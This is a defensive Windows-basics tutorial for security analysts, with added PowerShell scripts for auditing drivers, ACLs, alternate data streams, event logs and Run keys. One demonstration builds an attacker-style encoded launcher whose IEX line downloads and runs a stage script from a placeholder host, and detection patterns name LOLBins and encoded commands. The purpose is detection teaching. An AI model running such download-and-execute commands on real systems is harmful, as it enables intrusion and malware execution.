HackCert
Beginner 10 min read May 25, 2026

Windows Basics: Essential Architecture and Command Line Skills for Cyber Security Analysts

Master the fundamentals of the Windows operating system architecture and essential command-line tools crucial for cybersecurity analysts and defenders.

Rokibul Islam
Red Team Operator
Overview

In the vast and complex landscape of cybersecurity, the Microsoft Windows operating system stands as the undisputed titan of enterprise environments. Walk into almost any corporate office, government agency, or healthcare facility, and you will find an infrastructure predominantly built upon Windows Active Directory, Windows Servers, and thousands of Windows endpoints. Consequently, for any aspiring cybersecurity professional—whether you aim to be a Penetration Tester identifying vulnerabilities, an Incident Responder mitigating a breach, or a SOC Analyst monitoring network traffic—a profound understanding of Windows basics is not merely advantageous; it is an absolute prerequisite.

You cannot effectively defend a system, nor can you understand how an adversary exploits it, without first comprehending its internal architecture and operational mechanics. This article provides a comprehensive overview of the core components of the Windows operating system and explores the essential command-line utilities that form the foundation of technical cybersecurity analysis.

Core Concepts of Windows Architecture

The Windows operating system is a highly structured, layered environment designed to balance performance, hardware compatibility, and security. At a high level, the architecture is divided into two primary operational states: User Mode and Kernel Mode. This separation is crucial for maintaining system stability and preventing malicious or buggy software from crashing the entire machine.

User Mode vs. Kernel Mode

User Mode: The vast majority of the applications you interact with daily (web browsers, word processors, games, and even many administrative tools) run in User Mode. A User Mode process has no direct access to hardware or to kernel data structures; it runs in its own private virtual address space and obtains services such as file, registry and network access by making system calls through ntdll.dll into the kernel, which checks the caller's access token before acting. If a User Mode application crashes, only that process is affected; the rest of the operating system keeps running.

Kernel Mode: In stark contrast, Kernel Mode represents the absolute heart of the operating system. Code running in Kernel Mode has unrestricted, direct access to the system's hardware and all computer memory. The core operating system components, hardware drivers, and critical security mechanisms reside here. Because of this unrestricted access, a crash or a bug in Kernel Mode typically results in a total system failure, commonly known as the Blue Screen of Death (BSOD).

For cybersecurity analysts, understanding this divide is paramount. Code in Kernel Mode is not subject to the access checks that constrain User Mode, so malware that gains kernel execution (today most often by loading a legitimately signed but vulnerable third-party driver, the so-called bring-your-own-vulnerable-driver technique, rather than by exploiting the kernel directly) can hide its processes, files and network connections and can blind or disable the kernel-side sensors that EDR products depend on. Windows guards the boundary with Driver Signature Enforcement, which is precisely why the attacker needs a signed driver in the first place.
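A quick way to see what is actually running in Kernel Mode on a host, as an added example that is not part of the original article: the script below lists the loaded kernel drivers, checks each image's Authenticode signature and classifies the signer. The signer patterns it assumes (Microsoft's own drivers carry a subject beginning CN=Microsoft Windows; third-party WHQL drivers carry CN=Microsoft Windows Hardware Compatibility Publisher) reflect common Windows builds and may need adjusting; the output is a review list, not a verdict.

```powershell
# Added example (not from the original article): enumerate running kernel-mode
# drivers and classify each by its Authenticode signer. Run from an elevated prompt.
# Assumption: Microsoft's in-box drivers are signed with a subject starting
# "CN=Microsoft Windows," and third-party WHQL drivers with
# "CN=Microsoft Windows Hardware Compatibility Publisher"; adjust if your builds differ.
# On older builds catalog-signed in-box drivers can show NotSigned here; Sysinternals
# sigcheck confirms those.

function Get-KernelDriverInventory {
    [CmdletBinding()]
    param()

    Get-CimInstance -ClassName Win32_SystemDriver -Filter "State='Running'" |
        ForEach-Object {
            if (-not $_.PathName) { return }   # no image path recorded for this driver

            # PathName may be NT-style (\??\C:\... or \SystemRoot\...); normalise to a Win32 path.
            $path = $_.PathName -replace '^\\\?\?\\', '' -replace '^\\SystemRoot\\', "$env:SystemRoot\"

            if (-not (Test-Path -LiteralPath $path)) {
                # A running driver whose image is gone from disk deserves a closer look.
                [pscustomobject]@{ Name = $_.Name; Path = $path; Status = 'FileMissing'; Signer = ''; Class = 'Unknown' }
                return
            }

            $sig    = Get-AuthenticodeSignature -FilePath $path
            $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }

            $class = switch -Regex ($signer) {
                '^CN=Microsoft Windows,'                        { 'Microsoft in-box'; break }
                '^CN=Microsoft Windows Hardware Compatibility'  { 'Third-party (WHQL)'; break }
                '^$'                                            { 'Unsigned'; break }
                default                                         { 'Third-party (vendor cert)' }
            }

            [pscustomobject]@{
                Name   = $_.Name
                Path   = $path
                Status = $sig.Status      # Valid, NotSigned, HashMismatch, ...
                Signer = $signer
                Class  = $class
            }
        }
}

# Everything that is not a validly signed in-box driver is the review list. WHQL-signed
# third-party drivers are exactly the class abused by "bring your own vulnerable driver"
# attacks, so compare their names and versions against Microsoft's vulnerable driver blocklist.
Get-KernelDriverInventory |
    Where-Object { $_.Class -ne 'Microsoft in-box' -or $_.Status -ne 'Valid' } |
    Sort-Object Class, Name |
    Format-Table Name, Class, Status, Path -AutoSize
```

A valid signature only tells you who published the driver, not whether it is safe: the drivers that BYOVD tooling loads are validly signed, so the value of this list is in the names and versions it surfaces, which you then check against a blocklist.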

The Windows Registry

If the Kernel is the heart of Windows, the Registry is its central nervous system. The Windows Registry is a massive, hierarchical database that stores low-level settings for the operating system and for applications that opt to use the registry. It contains information regarding hardware configuration, installed software, user preferences, security policies, and system startup processes.

The Registry is presented as a tree of root keys, often loosely called hives. Strictly, the hives are the on-disk files (SYSTEM, SOFTWARE, SAM and SECURITY under %SystemRoot%\System32\config, and NTUSER.DAT in each user profile) that the kernel maps into the tree at boot and at logon. The two root keys analysts touch most are:

  • HKEY_LOCAL_MACHINE (HKLM): Settings that apply to the computer regardless of which user is logged in, including installed services, drivers and machine-wide autostart entries.
  • HKEY_CURRENT_USER (HKCU): Settings for the currently logged-on user. HKCU is only a link to that user's subtree under HKEY_USERS (HKU\<SID>), so when you examine another user's persistence you look there, not in HKCU.

Attackers abuse the Registry heavily. The classic persistence tactic (keeping malware alive across reboots) is to add a value under the Run or RunOnce keys at HKLM\Software\Microsoft\Windows\CurrentVersion (machine-wide, runs for every user) or the same path under HKCU (runs for that user), so the shell launches the referenced command at every logon; on 64-bit Windows the WOW6432Node copy of those keys is consulted as well. Because each value is a plain command line, anything odd in it (a binary in a user-writable directory, a LOLBin such as rundll32.exe or mshta.exe, an encoded PowerShell command) is a strong indicator.

Processes, Threads, and Services

Understanding how Windows executes code is fundamental to analyzing system behavior.

  • Processes: A process is an instance of a running executable program. It acts as a container, holding the memory space, security context, and resources required to execute the program.
  • Threads: A thread is the basic unit of execution within a process. A single process can have multiple threads running concurrently, allowing for multitasking within the application.
  • Services: Windows Services are long-running executables that operate in the background under the Service Control Manager (services.exe). They have no user interface and typically start automatically at boot, before any user logs on, usually under a highly privileged account such as LocalSystem. Each service is registered under HKLM\SYSTEM\CurrentControlSet\Services\<Name>, where the ImagePath value records the binary that is launched; sc qc <Name> or Get-Service shows the same data. Many core OS functions (the Windows Update and Event Log services) and third-party security agents run as services, which is exactly why attackers register their own malware as a service: it gets SYSTEM privileges, survives reboots, and blends into a long list of legitimate entries.

The File System (NTFS) and Permissions

Modern Windows systems utilize the New Technology File System (NTFS). Beyond basic file storage, NTFS provides robust security features, most notably Access Control Lists (ACLs).

Every file and folder in NTFS carries an ACL (a list of access control entries) that states which users or groups may Read, Write, Execute, Modify or take Full Control; icacls in CMD or Get-Acl in PowerShell displays it. Analysts must read NTFS permissions fluently, both to secure sensitive data and to spot privilege escalation paths: a low-privileged principal such as BUILTIN\Users or Everyone holding write access to a directory from which a service or scheduled task launches an executable lets that user swap in their own binary. Alternate Data Streams (ADS) are a second NTFS feature attackers use: a file can carry additional named streams (file.txt:payload.exe) that Explorer and a plain dir do not list and that do not change the visible file size; dir /r in CMD, or Get-Item -Stream * in PowerShell, reveals them. Windows itself uses an ADS named Zone.Identifier to record the Mark of the Web on downloaded files, so not every stream is malicious.
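The two checks described above, written out as an added example that is not part of the original article: one function walks a directory tree and reports every directory where a low-privileged principal holds write rights, the other lists a file's alternate data streams. The list of "low-privileged" principals and the demo file created in $env:TEMP are assumptions made for the demonstration.

```powershell
# Added example (not from the original article): two NTFS checks an analyst runs
# often. Find-WeakWriteAcl lists directories under a root where a low-privileged
# principal holds write rights; Show-AlternateDataStream lists the named streams of a
# file, which Explorer and a plain "dir" hide. The demo file in $env:TEMP is constructed
# here for illustration.

# Principals whose write access to a program directory usually means privilege escalation.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# FileSystemRights.Write = WriteData|AppendData|WriteAttributes|WriteExtendedAttributes;
# Modify and FullControl are supersets, so a bitwise test against Write catches all three.
# ACEs expressed with generic rights (e.g. GENERIC_ALL = 0x10000000) are not mapped here.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]::Write

function Find-WeakWriteAcl {
    param([Parameter(Mandatory)][string]$Root)

    Get-ChildItem -LiteralPath $Root -Directory -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $dir = $_.FullName
            $acl = Get-Acl -LiteralPath $dir -ErrorAction SilentlyContinue
            if (-not $acl) { return }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -eq 'Allow' -and
                    $LowPrivPrincipals -contains $ace.IdentityReference.Value -and
                    (([int]$ace.FileSystemRights -band $WriteMask) -ne 0)) {
                    [pscustomobject]@{
                        Path      = $dir
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                        Inherited = $ace.IsInherited
                    }
                }
            }
        }
}

function Show-AlternateDataStream {
    param([Parameter(Mandatory)][string]$Path)
    # Every file has the unnamed ':$DATA' stream; anything else is an ADS. Zone.Identifier
    # is a legitimate one (Mark of the Web on downloaded files); other names need explaining.
    Get-Item -LiteralPath $Path -Stream * |
        Where-Object { $_.Stream -ne ':$DATA' } |
        ForEach-Object {
            [pscustomobject]@{
                File    = $Path
                Stream  = $_.Stream
                Length  = $_.Length
                Preview = (Get-Content -LiteralPath $Path -Stream $_.Stream -TotalCount 1)
            }
        }
}

# Demonstration on a constructed file: hide a script in a stream, then find it.
$demo = Join-Path $env:TEMP 'ads-demo.txt'
Set-Content -LiteralPath $demo -Value 'innocent looking file'
Set-Content -LiteralPath $demo -Stream 'hidden.ps1' -Value 'Write-Output "payload from ADS"'
(Get-Item -LiteralPath $demo).Length     # counts only the main stream
Show-AlternateDataStream -Path $demo     # lists hidden.ps1 with its first line
Remove-Item -LiteralPath $demo

# Real target: anywhere services, scheduled tasks or autostart entries launch binaries from.
Find-WeakWriteAcl -Root "$env:ProgramFiles" | Format-Table -AutoSize
```

Point Find-WeakWriteAcl at the directories that service ImagePath values and scheduled tasks actually reference rather than at the whole drive; a writable directory only matters when something privileged executes from it.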

Essential Command Line Usage for Analysts

While the Windows Graphical User Interface (GUI) is intuitive, true cybersecurity analysis demands proficiency in the command line. The command line provides speed, automation capabilities, and access to low-level system information that the GUI often obscures. Windows offers two primary command-line interpreters: the legacy Command Prompt (CMD) and the incredibly powerful PowerShell.

Critical CMD Utilities

For decades, CMD has been the standard shell. While older, its built-in utilities remain indispensable for rapid system triage.

  • ipconfig: Used to view the current TCP/IP network configuration values (IP address, Subnet Mask, Default Gateway). Analysts use this to understand a machine's position within a network.
  • netstat: A crucial tool for displaying active TCP connections, listening ports, and Ethernet statistics. netstat -ano is frequently used to identify which specific process (via the Process ID or PID) is communicating over the network, helping to spot anomalous outgoing connections to command-and-control servers.
  • tasklist and taskkill: tasklist displays a list of currently running processes on a local or remote machine. taskkill is used to forcefully terminate processes by PID or image name.
  • systeminfo: Provides a comprehensive overview of the system's hardware and software configuration, including the OS version, architecture, and, crucially, the list of installed security hotfixes. Attackers check this to identify unpatched vulnerabilities.
  • whoami: Displays user, group, and privileges information for the currently logged-on user. whoami /priv is vital for identifying if the current user possesses special privileges (like SeDebugPrivilege or SeImpersonatePrivilege) that could be exploited for privilege escalation.
  • net user and net localgroup: Manage local user accounts and groups. net user lists every local account and net user <name> shows when it was created and when it last logged on; net localgroup Administrators lists who holds local admin rights. Analysts use these to hunt for newly created or unexpectedly promoted accounts.

The Power of PowerShell

PowerShell is a task automation and configuration management shell built on .NET. Where CMD passes text between commands, PowerShell passes objects with typed properties, so output can be filtered, sorted and joined without text parsing. That expressiveness, plus the fact that it is installed and trusted on every Windows host, makes it a favourite of system administrators and of attackers alike, from commodity malware to Advanced Persistent Threat (APT) groups.

  • Get-Process: Similar to tasklist, but returns objects with rich properties. You can easily filter and sort processes based on CPU usage, memory consumption, or specific properties.
  • Get-Service: Used to enumerate the status of services on a local or remote computer.
  • Get-WinEvent (and the older Get-EventLog): Get-WinEvent reads every Windows event log, including the "Applications and Services" logs, and accepts a -FilterHashtable that the Event Log service evaluates itself, so it is the tool for hunting Event IDs associated with malicious activity such as failed logon attempts (4625, Security log) or newly installed services (7045, System log). Get-EventLog reads only the classic logs and was removed in PowerShell 7; prefer Get-WinEvent.
  • Invoke-WebRequest: Sends HTTP/HTTPS requests and returns the response as an object. Attackers use it (or its aliases iwr, curl and wget; curl and wget exist only in Windows PowerShell 5.1) to fetch a second stage and pipe the response body straight into Invoke-Expression, so the script runs without ever being written to disk. That sidesteps file-based antivirus scanning but not AMSI, which hands script content to the installed AV engine at execution time.
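The event-log hunting the Get-WinEvent entry describes, as an added example that is not part of the original article: one function summarises failed logons (4625) by source address and account, the other lists newly installed services (7045) and flags binaries outside the Windows directory. The 24-hour window, the threshold of five failures and the "normal" path pattern are assumptions chosen for the demonstration.

```powershell
# Added example (not from the original article): hunting in the event logs with
# Get-WinEvent. FilterHashtable is evaluated by the Event Log service, so it is far
# faster than piping every event through Where-Object. Event IDs used: 4625 (failed
# logon, Security log) and 7045 (service installed, System log). Run elevated; the
# Security log is not readable by standard users.

$Since = (Get-Date).AddHours(-24)

# Turn an event's <EventData> into a name -> value hashtable instead of regexing Message.
function ConvertTo-EventDataHashtable {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml  = [xml]$Event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    return $data
}

function Get-FailedLogonSummary {
    param([datetime]$StartTime = $Since, [int]$Threshold = 5)

    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = $StartTime } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = ConvertTo-EventDataHashtable -Event $_
            [pscustomobject]@{
                Time      = $_.TimeCreated
                Account   = $data['TargetUserName']
                SourceIp  = $data['IpAddress']
                LogonType = $data['LogonType']      # 3 = network, 10 = RDP
                Status    = $data['Status']         # 0xC000006A bad password, 0xC0000064 no such user
            }
        } |
        Group-Object SourceIp, Account |
        Where-Object Count -ge $Threshold |
        Select-Object Count, Name |
        Sort-Object Count -Descending
}

function Get-NewService {
    param([datetime]$StartTime = $Since)

    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = $StartTime } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = ConvertTo-EventDataHashtable -Event $_
            [pscustomobject]@{
                Time        = $_.TimeCreated
                ServiceName = $data['ServiceName']
                ImagePath   = $data['ImagePath']
                StartType   = $data['StartType']
                Account     = $data['AccountName']
            }
        } |
        # Service binaries outside the Windows directory, or launched through an
        # interpreter, are the usual sign of an attacker-installed service.
        Where-Object {
            $_.ImagePath -notmatch '^"?(C:\\Windows\\|%SystemRoot%|\\SystemRoot\\|system32\\)' -or
            $_.ImagePath -match 'cmd\.exe|powershell|rundll32|mshta'
        }
}

Get-FailedLogonSummary | Format-Table -AutoSize
Get-NewService         | Format-Table -AutoSize -Wrap
```

Parsing the XML rather than the Message text matters: message strings are localised and reflowed, while the EventData field names (TargetUserName, IpAddress, ImagePath) are stable across languages and builds.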

Real-world Examples

Example 1: Identifying a Malicious Process. A SOC analyst receives an alert about suspicious outbound traffic from a workstation. From an elevated command prompt they run netstat -ano | findstr ESTABLISHED and spot a connection to an unfamiliar external IP on port 443 with PID 4052. tasklist /fi "PID eq 4052" reports the image name as svchost.exe, and tasklist /svc /fi "PID eq 4052" shows which services, if any, that instance hosts. A genuine svchost.exe runs from C:\Windows\System32, is started by services.exe, and always hosts at least one service; an svchost.exe that hosts no service, is loaded from another directory, or has a different parent is almost certainly malware masquerading as a system process. The destination alone is not proof, since legitimate svchost instances hosting Windows Update or BITS do talk to Microsoft hosts over 443. Having confirmed the anomaly on the process itself, the analyst isolates the machine for forensic analysis.
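The same triage done in PowerShell, as an added example that is not part of the original article: every established connection to a non-internal address is tied to its owning process, on-disk image, signature status and, for svchost.exe, the services it hosts, so the "svchost with no services or wrong path" test from Example 1 becomes a column. The internal address prefixes are an assumption; replace them with your own ranges.

```powershell
# Added example (not from the original article): attribute outbound connections to
# processes and check whether an svchost.exe instance looks genuine. Run elevated so
# that Get-Process can read the image path of every process.

# Assumed internal ranges: RFC 1918, loopback, unspecified and link-local addresses.
$InternalPrefixes = '^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.|127\.|0\.0\.0\.0$|::1$|::$|fe80:)'

function Get-HostedService {
    param([int]$ProcessId)
    # Win32_Service exposes the PID of the process hosting each service.
    (Get-CimInstance -ClassName Win32_Service -Filter "ProcessId = $ProcessId").Name -join ','
}

function Get-ExternalConnection {
    Get-NetTCPConnection -State Established |
        Where-Object { $_.RemoteAddress -notmatch $InternalPrefixes } |
        ForEach-Object {
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            $path = $proc.Path   # null for protected or already-exited processes
            $sig  = if ($path) { (Get-AuthenticodeSignature -FilePath $path).Status } else { 'n/a' }
            $svc  = if ($proc.Name -eq 'svchost') { Get-HostedService -ProcessId $proc.Id } else { '' }

            # A real svchost.exe lives in System32 and hosts at least one service.
            $fake = ($proc.Name -eq 'svchost') -and
                    ($svc -eq '' -or $path -ne "$env:SystemRoot\System32\svchost.exe")

            [pscustomobject]@{
                Remote     = "$($_.RemoteAddress):$($_.RemotePort)"
                PID        = $_.OwningProcess
                Process    = $proc.Name
                Path       = $path
                Signed     = $sig
                Services   = $svc
                Suspicious = $fake -or ($sig -ne 'Valid')
            }
        }
}

Get-ExternalConnection | Sort-Object Suspicious -Descending | Format-Table -AutoSize -Wrap
```

Get-NetTCPConnection is the object equivalent of netstat -ano; the join against Get-Process and Win32_Service is what the CMD version forces you to do by hand with tasklist /svc.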

Example 2: Discovering Persistence Mechanisms. An Incident Responder investigating a compromised server suspects the attacker has established persistence. They query the autostart keys with PowerShell: Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run (and repeat for RunOnce and for the HKCU equivalents). They spot a value named "WindowsUpdater" pointing to an executable at C:\Users\Public\Appdata\Local\Temp\update.exe. Legitimate updates are installed by the Windows Update service from under C:\Windows, never launched from a public temporary directory, so the responder records this as the attacker's persistence mechanism; running Get-AuthenticodeSignature on the file and preserving a copy before removing the value are the natural next steps.
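An audit that covers the autostart keys described in "The Windows Registry" and queried in Example 2, as an added example that is not part of the original article: it walks Run and RunOnce under HKLM, the WOW6432Node view, and every loaded user hive under HKEY_USERS (which is where HKCU actually points), resolves each value's command line to an executable, and flags entries in user-writable directories or without a valid signature. The set of "suspect" directories is an assumption for the demonstration.

```powershell
# Added example (not from the original article): audit the Run/RunOnce autostart keys
# for the machine, the 32-bit view, and every loaded user profile, and resolve each
# value to the executable it launches. Run elevated to read other users' hives.

$RunKeyTails = @(
    'Software\Microsoft\Windows\CurrentVersion\Run',
    'Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Assumed: directories from which nothing legitimate should be autostarting.
$SuspectDirs = '\\(Temp|Public|Downloads|AppData\\Local\\Temp|ProgramData)\\'

function Resolve-CommandImage {
    param([string]$Command)
    # Values look like:  "C:\path\app.exe" /arg   or   C:\path\app.exe /arg   or   %ProgramFiles%\...
    $cmd = [Environment]::ExpandEnvironmentVariables($Command).Trim()
    if ($cmd -match '^"([^"]+)"') { return $Matches[1] }
    # Unquoted: take everything up to the first token ending in .exe (tolerates spaces in the path).
    if ($cmd -match '^(.+?\.exe)\b') { return $Matches[1] }
    return ($cmd -split '\s+')[0]   # bare names (rundll32 foo.dll,Entry) are not resolved via PATH here
}

function Get-RunKeyEntry {
    # HKCU is just a link into HKEY_USERS, so enumerating HKU covers every loaded profile.
    $userRoots = Get-ChildItem Registry::HKEY_USERS |
        Where-Object { $_.Name -notmatch '_Classes$' } |
        ForEach-Object { "Registry::$($_.Name)" }
    $roots = @('HKLM:') + @($userRoots)

    foreach ($root in $roots) {
        foreach ($tail in $RunKeyTails) {
            $key = "$root\$tail"
            if (-not (Test-Path -LiteralPath $key)) { continue }
            $props = Get-ItemProperty -LiteralPath $key
            foreach ($p in $props.PSObject.Properties) {
                if ($p.Name -in @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')) { continue }
                $image  = Resolve-CommandImage -Command ([string]$p.Value)
                $exists = Test-Path -LiteralPath $image
                $sig    = if ($exists) { (Get-AuthenticodeSignature -FilePath $image).Status } else { 'FileMissing' }
                [pscustomobject]@{
                    Key        = $key
                    Name       = $p.Name
                    Command    = $p.Value
                    Image      = $image
                    Signature  = $sig
                    Suspicious = ($image -match $SuspectDirs) -or ($sig -ne 'Valid')
                }
            }
        }
    }
}

Get-RunKeyEntry | Where-Object Suspicious | Format-List
```

Run keys are only one autostart location; services, scheduled tasks, WMI event subscriptions and the Startup folder are the others attackers reach for, and Sysinternals Autoruns enumerates all of them in one pass. This script is the registry slice of that, with the executable resolution that Autoruns does for you made explicit.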

Best Practices & Mitigation

Securing a Windows environment requires a proactive approach centered on the Principle of Least Privilege and rigorous monitoring.

  1. Implement the Principle of Least Privilege (PoLP): Grant users only the privileges their job functions require. Nobody should do daily work with local Administrator rights; administration belongs in a separate account used only when needed. This caps the damage malware can do when a session is compromised.
  2. Harden the Registry and File System: Use Group Policy Objects (GPOs) to restrict access to sensitive registry keys and to enforce strict NTFS permissions on sensitive directories. Confirm, rather than assume, that standard users cannot write to directories under C:\Windows or C:\Program Files, and to any directory a service or scheduled task launches from.
  3. Enable Advanced Auditing: Default Windows logging is rarely sufficient for incident response. Enable the advanced audit policies, in particular process creation (Event ID 4688) together with the "Include command line in process creation events" policy, without which 4688 records the image name but not the arguments; also audit the registry keys that matter (Run keys, service definitions).
  4. Monitor PowerShell Execution: Enable Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), which records the content of every script block as it executes, after any obfuscation or decoding layer has been unwrapped; Module Logging (4103) and transcription add the pipeline output. Alert on encoded commands (-e, -ec, -enc, -EncodedCommand) and on download-and-execute patterns such as Invoke-Expression fed from a web request.
  5. Application Whitelisting: Deploy Windows Defender Application Control (WDAC) or AppLocker so that only explicitly approved executables and scripts run on endpoints and everything else is blocked by default; in enforced mode this also places PowerShell into Constrained Language Mode for unapproved scripts.
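The "encoded command" hunt from the PowerShell monitoring item, as an added example that is not part of the original article: a decoder for the -EncodedCommand argument (base64 over UTF-16LE) and a query that pulls encoded launches out of 4688 process-creation events. The sample command line is constructed here; the event query assumes command-line logging (item 3) is switched on, since otherwise the CommandLine field is empty.

```powershell
# Added example (not from the original article): find and decode encoded PowerShell
# in process-creation events (4688 with command-line logging enabled). The sample
# launcher below is constructed for the demonstration.

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    # powershell.exe accepts -e, -ec, -enc and -EncodedCommand; the argument is base64 of UTF-16LE text.
    if ($CommandLine -match '\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})') {
        try {
            $bytes = [Convert]::FromBase64String($Matches[1])
            return [Text.Encoding]::Unicode.GetString($bytes)
        } catch {
            return $null   # matched the shape but was not valid base64
        }
    }
    return $null
}

function Get-EncodedPowerShellEvent {
    param([datetime]$StartTime = (Get-Date).AddDays(-1))
    # Security 4688 requires the "Include command line in process creation events" policy
    # for the CommandLine field to be populated. Run elevated to read the Security log.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $StartTime } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $xml     = [xml]$_.ToXml()
            $fields  = $xml.Event.EventData.Data
            $cmdLine = ($fields | Where-Object Name -eq 'CommandLine').'#text'
            $decoded = if ($cmdLine) { ConvertFrom-EncodedCommand -CommandLine $cmdLine }
            if ($decoded) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Parent  = ($fields | Where-Object Name -eq 'ParentProcessName').'#text'
                    Launch  = $cmdLine
                    Decoded = $decoded
                }
            }
        }
}

# Constructed sample of what an attacker's launcher looks like in a 4688 CommandLine field.
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage.ps1")'
$b64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$sample  = "powershell.exe -NoP -W Hidden -enc $b64"
ConvertFrom-EncodedCommand -CommandLine $sample   # returns the IEX line above

Get-EncodedPowerShellEvent | Format-List
```

Script Block Logging (4104) records the same payload already decoded, because the engine logs what it is about to execute; the 4688 route is still worth having because it names the parent process and works for interpreters other than powershell.exe.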

Key Takeaways

A solid grasp of Windows basics is the bedrock upon which successful cybersecurity analysis is built. Understanding the fundamental differences between User Mode and Kernel Mode, navigating the complexities of the Windows Registry, and interpreting the file system's security controls are non-negotiable skills.

Furthermore, proficiency in command-line tools—ranging from legacy CMD utilities like netstat and systeminfo to the object-oriented power of PowerShell—enables analysts to quickly interrogate systems, identify anomalous behavior, and respond to threats effectively. As attackers continuously refine their techniques to blend in with legitimate system operations, defenders must possess a deep, intimate knowledge of the very operating system they are tasked with protecting. Without this foundational knowledge, the nuances of sophisticated cyber attacks will remain invisible.
